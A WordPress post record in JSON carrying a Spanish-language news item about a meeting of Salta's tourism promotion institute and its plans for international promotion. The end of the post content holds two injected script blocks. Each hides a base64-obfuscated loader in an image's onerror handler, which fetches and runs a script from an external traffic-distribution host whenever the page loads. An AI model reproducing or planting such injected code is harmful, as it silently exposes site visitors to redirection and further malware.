{"id":3832,"date":"2024-03-07T21:04:56","date_gmt":"2024-03-08T00:04:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3832"},"modified":"2025-08-13T23:58:53","modified_gmt":"2025-08-14T02:58:53","slug":"el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-ano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3832","title":{"rendered":"El turismo internacional ofrece grandes posibilidades de crecimiento en Salta este a\u00f1o"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-16e28620ca321e5ef9e34f1432403f2f\" style=\"background-color:#685111\"><em>Se reuni\u00f3 el directorio del Instituto de Promoci\u00f3n Tur\u00edstica de Salta, organismo dependiente del Ministerio de Turismo y Deportes, definiendo el calendario de promoci\u00f3n internacional para la participaci\u00f3n del sector privado en ferias y misiones comerciales.<\/em><\/h5>\n\n\n\n<p>El Gobierno realiz\u00f3 la primera reuni\u00f3n del a\u00f1o del Directorio del Instituto de Promoci\u00f3n Tur\u00edstica de Salta, encuentro que fue encabezado por el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>, acompa\u00f1ado por el presidente del Foro de Intendentes&nbsp;<strong>Daniel Moreno<\/strong>&nbsp;y la presidenta del organismo,&nbsp;<strong>Manuela Arancibia<\/strong>.<\/p>\n\n\n\n<p>En este marco, el Directorio integrado por \u00e1reas provinciales y referentes del sector privado de turismo, defini\u00f3 las prioridades para los pr\u00f3ximos meses, con el objetivo de consolidar el crecimiento sostenido de visitantes, tanto de mercados regionales como los prioritarios de Europa y Estados Unidos. De acuerdo al \u00faltimo balance del verano, se recuper\u00f3 el porcentaje del mercado previo a la pandemia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-1024x576.jpeg\" alt=\"\" class=\"wp-image-3833\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-1024x576.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-300x169.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-768x432.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-696x392.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio-746x420.jpeg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/03\/11202-el-turismo-internacional-ofrece-grandes-posibilidades-de-crecimiento-en-salta-este-anio.jpeg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><a href=\"https:\/\/www.salta.gob.ar\/\"><\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Con la informaci\u00f3n obtenida de los \u00faltimos balances de temporada, se planifican nuevas estrategias de inversi\u00f3n para potenciar la presencia en los mercados donde actualmente es fuerte y abrir nuevas posibilidades de visitantes. En este marco, se defini\u00f3 el calendario de promociones para la participaci\u00f3n del sector privado de Salta en ferias, caravanas de promoci\u00f3n y misiones comerciales.<\/p>\n\n\n\n<p>\u201cHay un contexto complejo en Argentina, por eso la definici\u00f3n del Gobierno es acompa\u00f1ar al sector privado en todas las acciones que podamos potenciar, estimando un crecimiento de entre el 7 y 10 %\u201d, indic\u00f3 el ministro Pe\u00f1a.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron, la secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>; la coordinadora ejecutiva del Inprotur&nbsp;<strong>Mar\u00eda Eugenia Cornejo<\/strong>; el vicepresidente del Tren a las Nubes,<strong>&nbsp;Pablo Epstein<\/strong>; la presidenta de la Asociaci\u00f3n de Hoteles de Turismo,&nbsp;<strong>Mariana Farjat<\/strong>, equipo del Inprotur y de la Secretar\u00eda de Turismo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se reuni\u00f3 el directorio del Instituto de Promoci\u00f3n Tur\u00edstica de Salta, organismo dependiente del Ministerio de Turismo y Deportes, definiendo el calendario de promoci\u00f3n internacional para la participaci\u00f3n del sector privado en ferias y misiones comerciales. El Gobierno realiz\u00f3 la primera reuni\u00f3n del a\u00f1o del Directorio del Instituto de Promoci\u00f3n Tur\u00edstica de Salta, encuentro que [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3834,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-3832","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3832"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3832"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3832\/revisions"}],"predecessor-version":[{"id":6828,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3832\/revisions\/6828"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3834"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3832"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3832"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}